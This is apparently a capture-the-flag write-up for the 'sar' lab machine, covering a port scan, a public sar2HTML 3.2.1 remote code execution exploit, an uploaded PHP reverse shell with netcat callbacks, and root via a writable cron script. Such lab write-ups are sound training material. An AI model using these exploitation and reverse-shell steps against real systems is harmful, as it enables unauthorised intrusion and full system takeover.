NMAP SCAN
=====================
# nmap -p- --min-rate=10000 192.168.64.35
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Directory Scan
=====================
robots.txt directed me to find sar2HTML directory.
On visiting the site I saw the sar2HTML version as 3.2.1.

$ searchsploit sar2html
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execut | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution  | php/webapps/47204.txt
------------------------------------------- ---------------------------------
$ searchsploit -m 49344.py
$ python sar2html.py
Enter The url => http://192.168.64.35/sar2HTML
Command => whoami
www-data

Command => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Command => pwd
/var/www/html/sar2HTML

User Flag
=====================
Upload a php reverse shell on /var/www/html and run it over the site at /sar2HTML/php-reverse-shell.php
Setup a netcat listener and soon I get a callback.

# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.64.200] from (UNKNOWN) [192.168.64.35] 44180
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 18:41:17 up  1:01,  0 users,  load average: 0.27, 0.77, 0.91
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")';
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/sh")';
$ python3 -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';
www-data@sar:/$ pwd
pwd

That's it, user flag obtained!

Root Flag
=====================
Upload linenum shell script and scan the system.
A cron job is set to run after about every 5 mins. The blunder is that it picks a script that is writable by my user.
So onwards is to write a reverse shell on the script that is picked by the cron. Make this script executable.
Setup a netcat listener, relax and wait for a root callback

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.64.200] from (UNKNOWN) [192.168.64.35] 56710
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

The box is rooted!



